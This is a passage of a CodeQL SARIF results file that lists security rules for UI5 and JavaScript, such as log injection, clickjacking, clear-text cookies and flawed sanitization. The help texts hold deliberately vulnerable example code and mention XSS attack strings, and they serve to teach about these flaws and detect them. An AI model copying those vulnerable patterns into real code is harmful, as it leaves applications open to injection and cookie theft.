- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set 
the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - 
"precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ], - "properties" : { - "isCodeQLModelPack" : true - } - }, { - "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.10+2daf50500ca8f7eb914c82e88dec36652bfbe8fd", - "notifications" : [ { - "id" : "js/diagnostics/extraction-errors", - "name" : "js/diagnostics/extraction-errors", - "shortDescription" : { - "text" : "Extraction errors" - }, - "fullDescription" : { - "text" : "List all extraction errors for files in the source code directory." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "description" : "List all extraction errors for files in the source code directory.", - "id" : "js/diagnostics/extraction-errors", - "kind" : "diagnostic", - "name" : "Extraction errors" - } - }, { - "id" : "js/diagnostics/successfully-extracted-files", - "name" : "js/diagnostics/successfully-extracted-files", - "shortDescription" : { - "text" : "Extracted files" - }, - "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted." 
- }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted.", - "id" : "js/diagnostics/successfully-extracted-files", - "kind" : "diagnostic", - "name" : "Extracted files" - } - } ], - "rules" : [ { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/clear-text-cookie", - "name" : "js/clear-text-cookie", - "shortDescription" : { - "text" : "Clear text transmission of sensitive cookie" - }, - "fullDescription" : { - "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. 
If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", - "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], - "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", - "id" : "js/clear-text-cookie", - "kind" : "problem", - "name" : "Clear text transmission of sensitive cookie", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/incomplete-sanitization", - "name" : "js/incomplete-sanitization", - "shortDescription" : { - "text" : "Incomplete string escaping or encoding" - }, - "fullDescription" : { - "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. 
Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. 
The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. 
Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. 
Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], - "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", - "id" : "js/incomplete-sanitization", - "kind" : "problem", - "name" : "Incomplete string escaping or encoding", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-html-expansion", - "name" : "js/unsafe-html-expansion", - "shortDescription" : { - "text" : "Unsafe expansion of self-closing HTML tag" - }, - "fullDescription" : { - "text" : "Using regular expressions to expand self-closing HTML tags may lead to cross-site scripting vulnerabilities." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `
` to `
` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n
\n\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n
\n\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `
` to `
` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n
\n\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n
\n\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using regular expressions to expand self-closing HTML\n tags may lead to cross-site scripting vulnerabilities.", - "id" : "js/unsafe-html-expansion", - "kind" : "problem", - "name" : "Unsafe expansion of self-closing HTML tag", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/bad-tag-filter", - "name" : "js/bad-tag-filter", - "shortDescription" : { - "text" : "Bad HTML filtering regexp" - }, - "fullDescription" : { - "text" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). 
However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common 
Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", - "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. 
This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: 